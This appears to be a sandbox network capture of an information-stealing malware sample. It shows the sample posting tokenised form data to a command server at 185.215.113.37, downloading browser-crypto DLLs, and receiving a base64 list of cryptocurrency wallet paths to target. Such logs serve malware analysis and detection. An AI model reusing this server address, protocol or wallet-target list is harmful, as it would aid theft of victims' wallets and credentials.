00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 24, 2024 19:29:07.714431047 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 24, 2024 19:29:09.850442886 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----FCFBFHIEBKJKFHIEBFBA Host: 185.215.113.37 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Oct 24, 2024 19:29:10.651264906 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:09 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 19:29:11.400403023 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGIJECGDGCBKECAKFBG Host: 185.215.113.37 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Oct 24, 2024 19:29:12.192274094 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:11 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 19:29:12.253169060 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIJEGIIJDGHDGCBGHCAA Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 4a 45 47 49 49 4a 44 47 48 44 47 43 42 47 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------HIJEGIIJDGHDGCBGHCAAContent-Disposition: form-data; name="file"------HIJEGIIJDGHDGCBGHCAA--
Oct 24, 2024 19:29:13.103781939 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:12 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 19:29:13.502521038 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GIIJEBAECGCBKECAAAEB Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 49 49 4a 45 42 41 45 43 47 43 42 4b 45 43 41 41 41 45 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------GIIJEBAECGCBKECAAAEBContent-Disposition: form-data; name="file"------GIIJEBAECGCBKECAAAEB--
Oct 24, 2024 19:29:14.285079002 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:13 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 19:29:14.581116915 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 24, 2024 19:29:14.883893967 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:14 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Oct 24, 2024 19:29:15.973678112 CEST	93	OUT	GET /0d60be0de163924d/mozglue.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 24, 2024 19:29:16.257039070 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:16 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Oct 24, 2024 19:29:16.895044088 CEST	94	OUT	GET /0d60be0de163924d/msvcp140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 24, 2024 19:29:17.178023100 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:17 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Oct 24, 2024 19:29:17.732657909 CEST	90	OUT	GET /0d60be0de163924d/nss3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 24, 2024 19:29:18.016415119 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:17 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Oct 24, 2024 19:29:19.654825926 CEST	94	OUT	GET /0d60be0de163924d/softokn3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 24, 2024 19:29:19.938538074 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:19 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Oct 24, 2024 19:29:20.304810047 CEST	98	OUT	GET /0d60be0de163924d/vcruntime140.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 24, 2024 19:29:20.605432987 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:20 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Oct 24, 2024 19:29:21.286603928 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IJDHCBGHJEGHJJKFHIIE Host: 185.215.113.37 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Oct 24, 2024 19:29:22.076004028 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:21 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=83 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 24, 2024 19:29:22.181143999 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGDBAFHJJDAKEBGCFCB Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 44 42 41 46 48 4a 4a 44 41 4b 45 42 47 43 46 43 42 2d 2d 0d 0a Data Ascii: ------AEGDBAFHJJDAKEBGCFCBContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------AEGDBAFHJJDAKEBGCFCBContent-Disposition: form-data; name="message"wallets------AEGDBAFHJJDAKEBGCFCB--
Oct 24, 2024 19:29:22.468303919 CEST	1236	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:22 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=82 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Oct 24, 2024 19:29:22.526715040 CEST	466	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JJJDGIECFCAKKFHIIIJE Host: 185.215.113.37 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 64 39 34 30 66 31 66 62 65 65 31 65 31 33 64 64 35 65 65 61 35 39 31 32 35 64 61 65 33 61 37 31 34 34 33 30 65 30 36 39 37 61 64 66 30 64 64 34 30 62 63 62 39 64 33 64 30 64 61 39 33 30 34 38 31 62 38 30 35 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4a 4a 44 47 49 45 43 46 43 41 4b 4b 46 48 49 49 49 4a 45 2d 2d 0d 0a Data Ascii: ------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="token"13fd940f1fbee1e13dd5eea59125dae3a714430e0697adf0dd40bcb9d3d0da930481b805------JJJDGIECFCAKKFHIIIJEContent-Disposition: form-data; name="message"files------JJJDGIECFCAKKFHIIIJE--
Oct 24, 2024 19:29:22.813260078 CEST	202	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 17:29:22 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=81 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
